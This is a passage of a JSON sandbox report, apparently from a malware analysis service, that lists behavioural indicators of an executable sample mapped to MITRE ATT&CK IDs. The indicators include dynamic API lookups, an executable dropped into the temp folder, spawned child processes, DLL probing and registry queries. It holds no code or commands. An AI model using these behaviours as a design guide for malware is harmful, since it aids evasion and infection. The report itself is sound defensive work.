\"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e9a6b@ADVAPI32.dll\"\n \"0e000f00703f9a6b@ADVAPI32.dll\"\n \"0e000f00cc3f9a6b@ADVAPI32.dll\"\n \"11001200b4479a6b@ADVAPI32.dll\"\n \"1100120048489a6b@ADVAPI32.dll\"\n \"120013008c489a6b@ADVAPI32.dll\"\n \"12001300e4489a6b@ADVAPI32.dll\"\n \"14001500386e9a6b@ADVAPI32.dll\"\n \"14001500506e9a6b@ADVAPI32.dll\"\n \"14001500686e9a6b@ADVAPI32.dll\"\n \"17001800806e9a6b@ADVAPI32.dll\"\n \"0d000e00986e9a6b@ADVAPI32.dll\"\n \"11001200a86e9a6b@ADVAPI32.dll\"\n \"11001200bc6e9a6b@ADVAPI32.dll\"\n \"0d000e0044669a6b@WININET.dll\"\n \"0d000e00b4669a6b@WININET.dll\"\n \"10001100ec669a6b@WININET.dll\"\n \"1000110090679a6b@WININET.dll\"\n \"10001100006f9a6b@WININET.dll\"\n \"10001100146f9a6b@WININET.dll\"\n \"14001500286f9a6b@WININET.dll\"\n \"14001500406f9a6b@WININET.dll\"\n \"12001300586f9a6b@WININET.dll\"\n \"120013006c6f9a6b@WININET.dll\"\n \"10001100d0679a6b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"CreateProcessW\" with parameter \":*C:\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe *\" - (UID: 00000000-00002936)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZUZZRG\" - (UID: 00000000-00005008)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has an writable section named \".data\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has an writable section named \".bss\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has an writable section named \".idata\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has an writable section named \".CRT\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has an writable section named \".tls\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" loaded module \"ADVAPI32.DLL\" at base 76660000\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" loaded module \"KERNEL32.DLL\" at base 76500000\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75af0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75af0000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75970000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 763b0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 768d0000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75c50000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70b30000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75d40000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 77520000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 715c0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 76500000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bbc0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002936)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003084)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763B0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc54 ...\" (UID: 00000000-00005008)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUZZRG\" (UID: 00000000-00003084)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc54 ...\" (UID: 00000000-00005008)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUZZRG\" (UID: 00000000-00003084)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" was detected as \"MinGW\" and name: \"Compiler\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002936]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" reads file \"c:\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\version.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002936]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"A7EB1DD3300405EA3D7F8995E1F0D745CFF468BF27BAA37466B4A8FC543ABBBA\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access 